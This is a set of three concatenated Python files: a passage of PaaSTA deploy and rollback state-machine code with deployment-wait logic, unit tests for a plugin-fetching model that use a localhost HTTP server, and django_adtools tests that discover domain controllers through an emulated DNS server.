yield {"source": "_begin", "dest": "start_deploy", "trigger": "start_deploy"}
yield {
"source": "start_deploy",
"dest": "deploying",
"trigger": "mfd_succeeded",
}
yield {"source": "deploying", "dest": "deployed", "trigger": "deploy_finished"}
yield {
"source": ["start_deploy", "start_rollback"],
"dest": "mfd_failed",
"trigger": "mfd_failed",
}
yield {
"source": [s for s in self.states() if not self.is_terminal_state(s)],
"dest": "deploy_errored",
"trigger": "deploy_errored",
}
yield {
"source": [s for s in self.states() if not self.is_terminal_state(s)],
"dest": "deploy_cancelled",
"trigger": "deploy_cancelled",
}
if rollback_is_possible:
yield {
"source": self.rollforward_states,
"dest": "start_rollback",
"trigger": "rollback_button_clicked",
"before": self.log_user_rollback,
}
yield {
"source": self.rollback_states,
"dest": None, # this makes it an "internal transition", effectively a noop.
"trigger": "rollback_button_clicked",
}
yield {
"source": self.rollforward_states,
"dest": "start_rollback",
"trigger": "rollback_slo_failure",
"before": self.log_slo_rollback,
}
yield {
"source": self.rollback_states,
"dest": None, # this makes it an "internal transition", effectively a noop.
"trigger": "rollback_slo_failure",
}
yield {
"source": self.rollback_states,
"dest": "start_deploy",
"trigger": "forward_button_clicked",
}
yield {
"source": self.rollforward_states,
"dest": None, # this makes it an "internal transition", effectively a noop.
"trigger": "forward_button_clicked",
}
yield {
"source": "start_rollback",
"dest": "rolling_back",
"trigger": "mfd_succeeded",
}
yield {
"source": "rolling_back",
"dest": "rolled_back",
"trigger": "deploy_finished",
}
yield {
"source": "deployed",
"dest": "complete",
"trigger": "complete_button_clicked",
}
yield {"source": "deployed", "dest": "complete", "trigger": "auto_certify"}
yield {
"source": ["rolled_back", "rolling_back"],
"dest": "abandon",
"trigger": "abandon_button_clicked",
}
yield {"source": "rolled_back", "dest": "abandon", "trigger": "auto_abandon"}
if rollback_is_possible:
# Suppress these buttons if it doesn't make sense to roll back.
yield {
"source": "*",
"dest": None, # Don't actually change state, just call the before function.
"trigger": "enable_auto_rollbacks_button_clicked",
"unless": [self.auto_rollbacks_enabled],
"before": self.enable_auto_rollbacks,
}
yield {
"source": "*",
"dest": None, # Don't actually change state, just call the before function.
"trigger": "disable_auto_rollbacks_button_clicked",
"conditions": [self.any_slo_failing, self.auto_rollbacks_enabled],
"before": self.disable_auto_rollbacks,
}
yield {
"source": "*",
"dest": None,
"trigger": "slos_started_failing",
"conditions": [self.auto_rollbacks_enabled],
"unless": [self.already_rolling_back],
"before": self.start_auto_rollback_countdown,
}
yield {
"source": "*",
"dest": None,
"trigger": "slos_stopped_failing",
"before": self.cancel_auto_rollback_countdown,
}
yield {
"source": "*",
"dest": None,
"trigger": "snooze_button_clicked",
"before": self.restart_timer,
"conditions": [self.is_timer_running],
}
def disable_auto_rollbacks(self):
self.cancel_auto_rollback_countdown()
self.auto_rollback = False
self.update_slack_status(
f"Automatic rollback disabled for this deploy. To disable this permanently for this step, edit `deploy.yaml` and set `auto_rollback: false` for the `{self.deploy_group}` step."
)
def enable_auto_rollbacks(self):
self.auto_rollback = True
self.auto_rollbacks_ever_enabled = True
self.update_slack_status(
            f"Automatic rollback enabled for this deploy. Will watch for failures and rollback when necessary. To set this permanently, edit `deploy.yaml` and set `auto_rollback: true` for the `{self.deploy_group}` step."
)
def auto_rollbacks_enabled(self) -> bool:
"""This getter exists so it can be a condition on transitions, since those need to be callables."""
return self.auto_rollback
def get_auto_rollback_delay(self) -> float:
return self.auto_rollback_delay
def get_auto_certify_delay(self) -> float:
if self.auto_certify_delay is not None:
return self.auto_certify_delay
else:
if self.auto_rollbacks_ever_enabled:
return DEFAULT_AUTO_CERTIFY_DELAY
else:
return 0
def already_rolling_back(self) -> bool:
return self.state in self.rollback_states
def status_code_by_state(self) -> Mapping[str, int]:
codes = {
"deploy_errored": 2,
"deploy_cancelled": 1,
"mfd_failed": self.mark_for_deployment_return_code,
"abandon": 1,
"complete": 0,
}
if not self.block:
# If we don't pass --wait-for-deployment, then exit immediately after mark-for-deployment succeeds.
codes["deploying"] = 0
if self.get_auto_certify_delay() <= 0:
# Instead of setting a 0-second timer to move to certify, just exit 0 when the deploy finishes.
codes["deployed"] = 0
return codes
def get_active_button(self) -> Optional[str]:
return {
"start_deploy": "forward",
"deploying": "forward",
"deployed": None,
"start_rollback": "rollback",
"rolling_back": "rollback",
"rolled_back": None,
}.get(self.state)
def on_enter_mfd_failed(self):
self.update_slack_status(
f"Marking `{self.commit[:8]}` for deployment for {self.deploy_group} failed. Please see Jenkins for more output."
) # noqa E501
def on_enter_deploying(self):
# if self.block is False, then deploying is a terminal state so we will promptly exit.
# Don't bother starting the background thread in this case.
if self.block:
thread = Thread(
target=self.do_wait_for_deployment, args=(self.commit,), daemon=True
)
thread.start()
self.cancel_paasta_status_reminder()
self.schedule_paasta_status_reminder()
def on_exit_deploying(self):
self.wait_for_deployment_green_lights[self.commit].clear()
self.cancel_paasta_status_reminder()
def on_enter_start_rollback(self):
self.update_slack_status(
f"Rolling back ({self.deploy_group}) to {self.old_git_sha}"
)
self.mark_for_deployment_return_code = mark_for_deployment(
git_url=self.git_url,
deploy_group=self.deploy_group,
service=self.service,
commit=self.old_git_sha,
)
if self.mark_for_deployment_return_code != 0:
self.trigger("mfd_failed")
else:
self.update_slack_thread(
f"Marked `{self.old_git_sha[:8]}` for {self.deploy_group}."
+ (
"\n" + self.get_authors()
if self.deploy_group_is_set_to_notify("notify_after_mark")
else ""
)
)
self.trigger("mfd_succeeded")
def on_enter_rolling_back(self):
if self.block:
thread = Thread(
target=self.do_wait_for_deployment,
args=(self.old_git_sha,),
daemon=True,
)
thread.start()
def on_exit_rolling_back(self):
self.wait_for_deployment_green_lights[self.old_git_sha].clear()
def on_enter_deploy_errored(self):
report_waiting_aborted(self.service, self.deploy_group)
self.update_slack_status(f"Deploy aborted, but it will still try to converge.")
self.send_manual_rollback_instructions()
if self.deploy_group_is_set_to_notify("notify_after_abort"):
self.ping_authors("Deploy errored")
def on_enter_deploy_cancelled(self):
if self.deploy_group_is_set_to_notify("notify_after_abort"):
self.ping_authors("Deploy cancelled")
def do_wait_for_deployment(self, target_commit: str):
try:
self.wait_for_deployment_green_lights[target_commit].set()
wait_for_deployment(
service=self.service,
deploy_group=self.deploy_group,
git_sha=target_commit,
soa_dir=self.soa_dir,
timeout=self.timeout,
green_light=self.wait_for_deployment_green_lights[target_commit],
progress=self.progress,
)
self.update_slack_thread(
f"Finished waiting for deployment of {target_commit}"
)
self.trigger("deploy_finished")
except (KeyboardInterrupt, TimeoutError):
if self.wait_for_deployment_green_lights[target_commit].is_set():
# When we manually trigger a rollback, we clear the green_light, which causes wait_for_deployment to
# raise KeyboardInterrupt. Don't trigger deploy_cancelled in this case.
self.trigger("deploy_cancelled")
except NoSuchCluster:
self.trigger("deploy_errored")
except Exception:
log.error("Caught exception in wait_for_deployment:")
log.error(traceback.format_exc())
self.trigger("deploy_errored")
def on_enter_rolled_back(self):
self.update_slack_status(
f"Finished rolling back to `{self.old_git_sha[:8]}` in {self.deploy_group}"
)
line = f"Rollback to {self.old_git_sha[:8]} for {self.deploy_group} complete"
_log(service=self.service, component="deploy", line=line, level="event")
self.start_timer(self.auto_abandon_delay, "auto_abandon", "abandon")
def on_enter_deployed(self):
self.update_slack_status(
f"Finished deployment of `{self.commit[:8]}` to {self.deploy_group}"
)
line = f"Deployment of {self.commit[:8]} for {self.deploy_group} complete"
_log(service=self.service, component="deploy", line=line, level="event")
self.send_manual_rollback_instructions()
if not (self.any_slo_failing() and self.auto_rollbacks_enabled()):
if self.get_auto_certify_delay() > 0:
self.start_timer(
self.get_auto_certify_delay(), "auto_certify", "certify"
)
if self.deploy_group_is_set_to_notify("notify_after_good_deploy"):
self.ping_authors()
def on_enter_complete(self):
if self.deploy_group_is_set_to_notify("notify_after_good_deploy"):
self.ping_authors()
def send_manual_rollback_instructions(self):
if self.old_git_sha != self.commit:
message = (
"If you need to roll back manually, run: "
f"`paasta rollback --service {self.service} --deploy-group {self.deploy_group} "
f"--commit {self.old_git_sha}`"
)
self.update_slack_thread(message)
print(message)
def after_state_change(self):
self.update_slack()
super().after_state_change()
def get_signalfx_api_token(self) -> str:
return (
load_system_paasta_config()
.get_monitoring_config()
.get("signalfx_api_key", None)
)
def get_button_text(self, button, is_active) -> str:
active_button_texts = {
"forward": f"Rolling Forward to {self.commit[:8]} :zombocom:"
}
inactive_button_texts = {
"forward": f"Continue Forward to {self.commit[:8]} :arrow_forward:",
"complete": f"Complete deploy to {self.commit[:8]} :white_check_mark:",
"snooze": f"Reset countdown",
"enable_auto_rollbacks": "Enable auto rollbacks :eyes:",
"disable_auto_rollbacks": "Disable auto rollbacks :close_eyes_monkey:",
}
if self.old_git_sha is not None:
active_button_texts.update(
{"rollback": f"Rolling Back to {self.old_git_sha[:8]} :zombocom:"}
)
inactive_button_texts.update(
{
"rollback": f"Roll Back to {self.old_git_sha[:8]} :arrow_backward:",
"abandon": f"Abandon deploy, staying on {self.old_git_sha[:8]} :x:",
}
)
return (active_button_texts if is_active else inactive_button_texts)[button]
def start_auto_rollback_countdown(self, extra_text="") -> None:
cancel_button_text = self.get_button_text(
"disable_auto_rollbacks", is_active=False
)
super().start_auto_rollback_countdown(
extra_text=f'Click "{cancel_button_text}" to cancel this!'
)
if self.deploy_group_is_set_to_notify("notify_after_auto_rollback"):
self.ping_authors()
def deploy_group_is_set_to_notify(self, notify_type):
return deploy_group_is_set_to_notify(
self.deploy_info, self.deploy_group, notify_type
)
def __build_rollback_audit_details(
self, rollback_type: RollbackTypes
) -> Dict[str, str]:
return {
"rolled_back_from": self.commit,
"rolled_back_to": self.old_git_sha,
"rollback_type": rollback_type.value,
"deploy_group": self.deploy_group,
}
def log_slo_rollback(self) -> None:
_log_audit(
action="rollback",
action_details=self.__build_rollback_audit_details(
RollbackTypes.AUTOMATIC_SLO_ROLLBACK
),
service=self.service,
)
def log_user_rollback(self) -> None:
_log_audit(
action="rollback",
action_details=self.__build_rollback_audit_details(
RollbackTypes.USER_INITIATED_ROLLBACK
),
service=self.service,
)
class ClusterData:
"""An auxiliary data transfer class.
Used by _query_clusters(), instances_deployed(),
_run_cluster_worker(), _run_instance_worker().
:param cluster: the name of the cluster.
:param service: the name of the service.
:param git_sha: git sha marked for deployment.
:param instances_queue: a thread-safe queue. Should contain all cluster
instances that need to be checked.
:type instances_queue: Queue
"""
def __init__(self, cluster, service, git_sha, instances_queue):
self.cluster = cluster
self.service = service
self.git_sha = git_sha
self.instances_queue = instances_queue
def __repr__(self):
return (
f"ClusterData(cluster={self.cluster}, service={self.service}, "
f"git_sha={self.git_sha}, instances_queue={self.instances_queue})"
)
def instances_deployed(cluster_data, instances_out, green_light):
"""Create a thread pool to run _run_instance_worker()
:param cluster_data: an instance of ClusterData.
    :param instances_out: an empty thread-safe queue. It will contain
                          instances that are not deployed yet.
:type instances_out: Queue
:param green_light: See the docstring for _query_clusters().
"""
num_threads = min(5, cluster_data.instances_queue.qsize())
workers_launched = []
for _ in range(num_threads):
worker = Thread(
target=_run_instance_worker, args=(cluster_data, instances_out, green_light)
)
worker.start()
workers_launched.append(worker)
for worker in workers_launched:
worker.join()
def _run_instance_worker(cluster_data, instances_out, green_light):
"""Get instances from the instances_in queue and check them one by one.
If an instance isn't deployed, add it to the instances_out queue
to re-check it later.
:param cluster_data: an instance of ClusterData.
:param instances_out: See the docstring for instances_deployed().
:param green_light: See the docstring for _query_clusters().
"""
api = client.get_paasta_api_client(cluster=cluster_data.cluster)
if not api:
log.warning(
"Couldn't reach the PaaSTA api for {}! Assuming it is not "
"deployed there yet.".format(cluster_data.cluster)
)
while not cluster_data.instances_queue.empty():
try:
instance_config = cluster_data.instances_queue.get(block=False)
except Empty:
return
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
while not cluster_data.instances_queue.empty() and green_light.is_set():
try:
instance_config = cluster_data.instances_queue.get(block=False)
except Empty:
return
instance = instance_config.get_instance()
log.debug(
"Inspecting the deployment status of {}.{} on {}".format(
cluster_data.service, instance, cluster_data.cluster
)
)
try:
status = None
status = api.service.status_instance(
service=cluster_data.service,
instance=instance,
include_smartstack=False,
include_envoy=False,
include_mesos=False,
).result()
except HTTPError as e:
if e.response.status_code == 404:
log.warning(
"Can't get status for instance {}, service {} in "
"cluster {}. This is normally because it is a new "
"service that hasn't been deployed by PaaSTA yet".format(
instance, cluster_data.service, cluster_data.cluster
)
)
else:
log.warning(
"Error getting service status from PaaSTA API for {}: {}"
"{}".format(
cluster_data.cluster, e.response.status_code, e.response.text
)
)
except ConnectionError as e:
log.warning(
"Error getting service status from PaaSTA API for {}:"
"{}".format(cluster_data.cluster, e)
)
long_running_status = None
if status:
if status.marathon:
long_running_status = status.marathon
elif status.kubernetes:
long_running_status = status.kubernetes
if not status:
log.debug(
"No status for {}.{}, in {}. Not deployed yet.".format(
cluster_data.service, instance, cluster_data.cluster
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
elif not long_running_status:
log.debug(
"{}.{} in {} is not a Marathon or Kubernetes job. Marked as deployed.".format(
cluster_data.service, instance, cluster_data.cluster
)
)
elif (
long_running_status.expected_instance_count == 0
or long_running_status.desired_state == "stop"
):
log.debug(
"{}.{} in {} is marked as stopped. Marked as deployed.".format(
cluster_data.service, status.instance, cluster_data.cluster
)
)
else:
if long_running_status.app_count != 1:
print(
" {}.{} on {} is still bouncing, {} versions "
"running".format(
cluster_data.service,
status.instance,
cluster_data.cluster,
long_running_status.app_count,
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
continue
if not cluster_data.git_sha.startswith(status.git_sha):
print(
" {}.{} on {} doesn't have the right sha yet: {}".format(
cluster_data.service,
instance,
cluster_data.cluster,
status.git_sha,
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
continue
if long_running_status.deploy_status not in [
"Running",
"Deploying",
"Waiting",
]:
print(
" {}.{} on {} isn't running yet: {}".format(
cluster_data.service,
instance,
cluster_data.cluster,
long_running_status.deploy_status,
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
continue
# The bounce margin factor defines what proportion of instances we need to be "safe",
# so consider it scaled up "enough" if we have that proportion of instances ready.
required_instance_count = int(
math.ceil(
instance_config.get_bounce_margin_factor()
* long_running_status.expected_instance_count
)
)
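            # For example (illustrative numbers), with a bounce margin factor of 0.95 and
            # an expected_instance_count of 20: required_instance_count = ceil(0.95 * 20) = 19.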
if required_instance_count > long_running_status.running_instance_count:
print(
" {}.{} on {} isn't scaled up yet, "
"has {} out of {} required instances (out of a total of {})".format(
cluster_data.service,
instance,
cluster_data.cluster,
long_running_status.running_instance_count,
required_instance_count,
long_running_status.expected_instance_count,
)
)
cluster_data.instances_queue.task_done()
instances_out.put(instance_config)
continue
print(
"Complete: {}.{} on {} looks 100% deployed at {} "
"instances on {}".format(
cluster_data.service,
instance,
cluster_data.cluster,
long_running_status.running_instance_count,
status.git_sha,
)
)
cluster_data.instances_queue.task_done()
def _query_clusters(clusters_data, green_light):
"""Run _run_cluster_worker() in a separate thread for each paasta cluster
:param clusters_data: a list of ClusterData instances.
:param green_light: an instance of threading.Event().
It is supposed to be cleared when KeyboardInterrupt is
received. All running threads should check it
periodically and exit when it is cleared.
"""
workers_launched = []
for cluster_data in clusters_data:
if not cluster_data.instances_queue.empty():
worker = Thread(
target=_run_cluster_worker, args=(cluster_data, green_light)
)
worker.start()
workers_launched.append(worker)
for worker in workers_launched:
try:
            while green_light.is_set() and worker.is_alive():
time.sleep(0.2)
except (KeyboardInterrupt, SystemExit):
green_light.clear()
print("KeyboardInterrupt received. Terminating..")
worker.join()
def _run_cluster_worker(cluster_data, green_light):
"""Run instances_deployed() for a cluster
:param cluster_data: an instance of ClusterData.
:param green_light: See the docstring for _query_clusters().
"""
instances_out = Queue()
instances_deployed(
cluster_data=cluster_data, instances_out=instances_out, green_light=green_light
)
cluster_data.instances_queue = instances_out
if cluster_data.instances_queue.empty():
print(f"Deploy to {cluster_data.cluster} complete!")
return cluster_data
WAIT_FOR_INSTANCE_CLASSES = [
MarathonServiceConfig,
KubernetesDeploymentConfig,
CassandraClusterDeploymentConfig,
]
def clusters_data_to_wait_for(service, deploy_group, git_sha, soa_dir):
service_configs = PaastaServiceConfigLoader(
service=service, soa_dir=soa_dir, load_deployments=False
)
total_instances = 0
clusters_data = []
api_endpoints = load_system_paasta_config().get_api_endpoints()
for cluster in service_configs.clusters:
if cluster not in api_endpoints:
print(
PaastaColors.red(
"Cluster %s is NOT in paasta-api endpoints config." % cluster
)
)
raise NoSuchCluster
        # Currently only marathon, kubernetes and cassandra instances are
        # supported for wait_for_deployment because they are the only things
        # worth waiting on.
instances_queue = Queue()
for instance_class in WAIT_FOR_INSTANCE_CLASSES:
for instance_config in service_configs.instance_configs(
cluster=cluster, instance_type_class=instance_class
):
if instance_config.get_deploy_group() == deploy_group:
instances_queue.put(instance_config)
total_instances += 1
if not instances_queue.empty():
clusters_data.append(
ClusterData(
cluster=cluster,
service=service,
git_sha=git_sha,
instances_queue=instances_queue,
)
)
return clusters_data, total_instances
def wait_for_deployment(
service, deploy_group, git_sha, soa_dir, timeout, green_light=None, progress=None
):
clusters_data, total_instances = clusters_data_to_wait_for(
service, deploy_group, git_sha, soa_dir
)
if not clusters_data:
_log(
service=service,
component="deploy",
line=(
"Couldn't find any marathon instances for service {} in deploy group {}. Exiting.".format(
service, deploy_group
)
),
level="event",
)
return
print(
"Waiting for deployment of {} for '{}' to complete...".format(
git_sha, deploy_group
)
)
deadline = time.time() + timeout
if green_light is None:
green_light = Event()
green_light.set()
with progressbar.ProgressBar(maxval=total_instances) as bar:
while time.time() < deadline:
_query_clusters(clusters_data, green_light)
if not green_light.is_set():
raise KeyboardInterrupt
finished_instances = total_instances - sum(
(c.instances_queue.qsize() for c in clusters_data)
)
bar.update(finished_instances)
if progress is not None:
progress.percent = bar.percentage
progress.waiting_on = {
c.cluster: list(c.instances_queue.queue) for c in clusters_data
}
if all((cluster.instances_queue.empty() for cluster in clusters_data)):
sys.stdout.flush()
if progress is not None:
progress.percent = 100.0
progress.waiting_on = None
return 0
else:
time.sleep(min(60, timeout))
sys.stdout.flush()
_log(
service=service,
component="deploy",
line=compose_timeout_message(
clusters_data, timeout, deploy_group, service, git_sha
),
level="event",
)
raise TimeoutError
def compose_timeout_message(clusters_data, timeout, deploy_group, service, git_sha):
cluster_instances = {}
for c_d in clusters_data:
while c_d.instances_queue.qsize() > 0:
cluster_instances.setdefault(c_d.cluster, []).append(
c_d.instances_queue.get(block=False).get_instance()
)
c_d.instances_queue.task_done()
paasta_status = []
paasta_logs = []
for cluster, instances in sorted(cluster_instances.items()):
if instances:
joined_instances = ",".join(instances)
paasta_status.append(
"paasta status -c {cluster} -s {service} -i {instances}".format(
cluster=cluster, service=service, instances=joined_instances
)
)
paasta_logs.append(
"paasta logs -c {cluster} -s {service} -i {instances} -C deploy -l 1000".format(
cluster=cluster, service=service, instances=joined_instances
)
)
return (
"\n\nTimed out after {timeout} seconds, waiting for {service} "
"in {deploy_group} to be deployed by PaaSTA.\n"
"This probably means the deploy hasn't succeeded. The new service "
"might not be healthy or one or more clusters could be having issues.\n\n"
"To debug try running:\n\n"
" {status_commands}\n\n {logs_commands}"
"\n\nIf the service is known to be slow to start you may wish to "
"increase the timeout on this step.\n"
"To wait a little longer run:\n\n"
" paasta wait-for-deployment -s {service} -l {deploy_group} -c {git_sha}".format(
timeout=timeout,
deploy_group=deploy_group,
service=service,
git_sha=git_sha,
status_commands="\n ".join(paasta_status),
logs_commands="\n ".join(paasta_logs),
)
)
class NoSuchCluster(Exception):
"""To be raised by wait_for_deployment() when a service has a marathon config for
a cluster that is not listed in /etc/paasta/api_endpoints.json.
"""
pass
|
test_fetchplugin_dialog_model.py
|
"""test_fetchplugin_dialog_model.py - tests the fetchplugin_dialog_model module
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
from models import fetchplugin_dialog_model
from models import zipper
from controllers import pathfinder
import cStringIO
import os
import SimpleHTTPServer
import SocketServer
import random
import threading
import unittest
import urllib
class TestFetchPluginDialogModel(unittest.TestCase):
"""Tests the FetchPluginDialogModel class"""
@classmethod
def local_plugin(cls, plugin_name):
"""Returns the local path and filename of the specified plugin archive."""
cur_dir = os.getcwd()
if os.path.normcase(cur_dir) == os.path.normcase(os.path.dirname(__file__)):
# Running this test module directly
return os.path.join('support_files', plugin_name)
else:
# Running as part of larger project test suite
return os.path.join('models', 'tests', 'support_files', plugin_name)
@property
def plugin(self):
"""Returns the path and filename to the known good plugin"""
return TestFetchPluginDialogModel.local_plugin('good_medfilter_plugin.zip')
def setUp(self):
"""Creates a SimpleHTTPServer instance to handle a single
request. Use self.server_thd.start() to initiate."""
self.mock_controller = ""
self.model = fetchplugin_dialog_model.FetchPluginDialogModel(self.mock_controller)
self.plugin_url_params = {'url': self.plugin,
'zip_encrypted': False,
'zip_password': None}
def test_get_plugin(self):
"""Verify the model successfully retrieves the plugin"""
self.model.get_plugin(self.plugin_url_params)
with open(self.plugin, 'rb') as fidin:
local_plugin = fidin.read()
self.assertEqual(local_plugin, self.model.plugin_fetcher.plugin)
self.assertEqual(cStringIO.StringIO(local_plugin).getvalue(),
self.model.plugin_fetcher.plugin)
def test_get_readme(self):
"""Verify model returns the plugin archive's README"""
readme_fetcher = zipper.UnZipper(self.plugin)
expected_readme = readme_fetcher.read("readme.txt")
retrieved_readme = self.model.get_readme(self.plugin_url_params)
self.assertEqual(expected_readme, retrieved_readme)
def test_install_plugin(self):
"""Verify installation of the plugin"""
sample_plugin_url = TestFetchPluginDialogModel.local_plugin('greets_plugin.zip')
installed_plugin_name = os.path.join(pathfinder.plugins_path(), 'greets_plugin.py')
plugin_url_params = {'url': sample_plugin_url,
'zip_encrypted': True,
'zip_password': '9225'}
self.model.get_plugin(plugin_url_params)
successful_installation = self.model.install_plugin()
self.assertTrue(os.path.exists(installed_plugin_name))
self.assertTrue(successful_installation)
# Clean up - attempt to remove the sample plugin if it already exists
if os.path.exists(installed_plugin_name):
try:
os.remove(installed_plugin_name)
except WindowsError: # file in use
return
class TestRemoteFetchPluginDialogModel(unittest.TestCase):
"""Tests the FetchRemotePluginDialogModel class"""
@classmethod
def setUpClass(cls):
"""Create a SimpleHTTPServer instance to serve test files from the support_files folder"""
cls.PORT = 8000 + random.randint(1, 1000)
req_handler = SimpleHTTPServer.SimpleHTTPRequestHandler
cls.httpd = SocketServer.TCPServer(("localhost", cls.PORT), req_handler)
cls.httpd.timeout = 5
@classmethod
def local_plugin(cls, plugin_name):
"""Returns the local path and filename of the specified plugin archive."""
cur_dir = os.getcwd()
if os.path.normcase(cur_dir) == os.path.normcase(os.path.dirname(__file__)):
# Running this test module directly
return os.path.join('support_files', plugin_name)
else:
# Running as part of larger project test suite
return os.path.join('models', 'tests', 'support_files', plugin_name)
@classmethod
def local_plugin_url(cls, plugin_name):
"""Returns the plugin converted to an URL"""
return urllib.pathname2url(TestRemoteFetchPluginDialogModel.local_plugin(plugin_name))
@classmethod
def plugin_url_params(cls, plugin_name):
"""Returns the URL to the specified plugin name when served by the test server"""
return 'http://localhost:{0}/{1}'.format(cls.PORT,
TestRemoteFetchPluginDialogModel.local_plugin_url(
plugin_name))
@property
def plugin(self):
"""Returns the path and filename to the known good plugin"""
return TestRemoteFetchPluginDialogModel.local_plugin('good_medfilter_plugin.zip')
@property
def good_plugin_url(self):
"""Returns the URL to the known good plugin"""
return TestRemoteFetchPluginDialogModel.plugin_url_params('good_medfilter_plugin.zip')
def setUp(self):
"""Creates a SimpleHTTPServer instance to handle a single
request. Use self.server_thd.start() to initiate."""
self.server_thd = threading.Thread(
target=TestRemoteFetchPluginDialogModel.httpd.handle_request)
self.mock_controller = ""
self.model = fetchplugin_dialog_model.FetchRemotePluginDialogModel(self.mock_controller)
self.plugin_url_params = {'url': self.good_plugin_url,
'login': False,
'username': None,
'password': None,
'zip_encrypted': False,
'zip_password': None}
def tearDown(self):
"""Shuts down the server process if still active"""
if self.server_thd.is_alive():
self.server_thd.join()
def test_get_plugin(self):
"""Verify the model successfully retrieves the plugin"""
self.server_thd.start()
self.model.get_plugin(self.plugin_url_params)
with open(self.plugin, 'rb') as fidin:
local_plugin = fidin.read()
self.assertEqual(local_plugin, self.model.plugin_fetcher.plugin)
self.assertEqual(cStringIO.StringIO(local_plugin).getvalue(),
self.model.plugin_fetcher.plugin)
def test_get_readme(self):
"""Verify model returns the plugin archive's README"""
self.server_thd.start()
readme_fetcher = zipper.UnZipper(self.plugin)
expected_readme = readme_fetcher.read("readme.txt")
self.model.get_plugin(self.plugin_url_params)
retrieved_readme = self.model.get_readme(self.plugin_url_params)
self.assertEqual(expected_readme, retrieved_readme)
def test_install_plugin(self):
"""Verify installation of the plugin"""
self.server_thd.start()
sample_plugin_url = TestRemoteFetchPluginDialogModel.plugin_url_params('greets_plugin.zip')
installed_plugin_name = os.path.join(pathfinder.plugins_path(), 'greets_plugin.py')
plugin_url_params = {'url': sample_plugin_url,
'login': False,
'username': None,
'password': None,
'zip_encrypted': True,
'zip_password': '9225'}
self.model.get_plugin(plugin_url_params)
successful_installation = self.model.install_plugin()
self.assertTrue(os.path.exists(installed_plugin_name))
self.assertTrue(successful_installation)
# Clean up - attempt to remove the sample plugin if it already exists
if os.path.exists(installed_plugin_name):
try:
os.remove(installed_plugin_name)
except WindowsError: # file in use
return
if __name__ == "__main__":
random.seed()
unittest.main()
|
tests.py
|
from time import sleep
from django.conf import settings
from typing import List, Tuple
# import os
# testing libraries
from django.test import TestCase
from unittest_dataprovider import data_provider
# django_adtools
import django_adtools.ad_tools
from django_adtools.ad_tools import ad_clear_username
from django_adtools.discover_dc import DCList, re_ip
# emulation of a DNS Server
from dnslib.zoneresolver import ZoneResolver
from dnslib.server import DNSServer
# emulation of a TCP Server
import socket
# threading
from threading import Thread, Lock
# todo
# emulation of an LDAP Server
# import logging
# from django_adtools import logger
from .models import *
# from io import StringIO
# from django.core.management import call_command
# the simple DNS zone file for testing getting SRV records from dnslib.DNSServer (the python emulator of DNS Server)
zone_file: str = """
{domain}. 600 IN SOA localhost localhost ( 2007120710 1d 2h 4w 1h )
{domain}. 400 IN NS localhost
{domain}. 600 IN A 127.0.0.1
controller.{domain}. IN A 127.0.0.1
_ldap._tcp.dc._msdcs.{domain}. 600 IN SRV 1 10 {port} {srv_address}."""
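# For example (illustrative values), formatting the template with domain='domain.local',
# port=5555 and srv_address='controller.domain.local' produces the SRV line:
# _ldap._tcp.dc._msdcs.domain.local. 600 IN SRV 1 10 5555 controller.domain.local.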
domain: str = 'domain.local' # testing name of the domain
class ServerInfo:
"""
Contains information about TCP Server
"""
def __init__(self):
self.port: int = 0 # a number of a TCP port
        self.connection_established: bool = False  # a client has established a connection to the server (True)
def __str__(self):
return f"ServerInfo(port={self.port}, connection_etablished={self.connection_established}"
def start_tcp_server(server_info: ServerInfo, lock: Lock) -> None:
"""
Starts a TCP server on a random free port, then waits for connection from a client
:param server_info:
:type server_info: ServerInfo
:param lock:
:type lock: Lock
:return: None
"""
lock.acquire() # this lock means that socket is still creating
sock: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', 0)) # bind to a random free port
sock.listen(1)
server_info.port = sock.getsockname()[1] # save the number of the server port
lock.release() # the socket is created
_ = sock.accept() # blocks here until a connection from a client
server_info.connection_established = True
sock.close()
class TestDiscoverDC(TestCase):
@staticmethod
def ip_addresses() -> Tuple[
Tuple[str, bool], Tuple[str, bool], Tuple[str, bool], Tuple[str, bool], Tuple[str, bool]
]:
"""
Dataprovider for test_re_ip
"""
return (
('127.0.0.1', True,),
('10.1.2.3', True,),
('256.255.255.0', False,),
('something', False,),
('0.0.0.0', True,),
)
@data_provider(ip_addresses)
def test_re_ip(self, ip_address: str, is_valid_ip: bool):
"""
Tests re_ip regex pattern to match ipv4 addresses only
"""
self.assertEqual(bool(re_ip.search(ip_address)), is_valid_ip)
@staticmethod
def srv_addresses() -> Tuple[Tuple[str], Tuple[str],]:
"""
Dataprovider for test_discover
"""
return (
(f'controller.{domain}',),
('127.0.0.1',),
)
@data_provider(srv_addresses)
def test_discover(self, srv_address: str):
server_info = ServerInfo()
lock: Lock = Lock()
Thread(target=start_tcp_server, args=(server_info, lock)).start()
sleep(0.01) # wait for thread
        # waiting for the TCP server emulator thread to come up
lock.acquire()
lock.release()
name_servers: List[str] = ['127.0.0.1'] # the list of nameservers
# configures the DNS Server
zone_resolver: ZoneResolver = ZoneResolver(
zone=zone_file.format(domain=domain, srv_address=srv_address, port=server_info.port),
)
# port=0 means that the DNS Server will choose a free UDP Port
dns_server: DNSServer = DNSServer(resolver=zone_resolver, port=0, tcp=False)
dns_server.start_thread() # start the DNS Server in a separate python thread
        sleep(0.1)  # waiting for the DNS Server thread to come up
port: int = dns_server.server.server_address[1] # gets the number of the UDP Port
# discover for domain controllers
dc_list: DCList = DCList(domain=domain, nameservers=name_servers, port=port)
self.assertIsNotNone(dc_list.get_dc_list(), 'Could not get a list of Domain Controllers')
# try to get an available domain controller
dc: str = dc_list.get_available_dc_ip()
self.assertIsNotNone(dc, "Could not get an available Domain Controller")
# stop DNS Server
dns_server.server.server_close()
dns_server.stop()
class TestSettings(TestCase):
"""
This class contains tests for the settings.py file
"""
def test_installed_apps(self):
"""
Checks that 'django_adtools' are in INSTALLED_APPS
"""
self.assertIn(__package__, settings.INSTALLED_APPS)
class TestDomainControllerModel(TestCase):
def test_domain_controller_model(self):
ip: str = '127.0.0.1'
DomainController.set(ip=ip)
dc: str = DomainController.get()
self.assertIsNotNone(dc)
#
#
# class TestManagementCommands(TestCase):
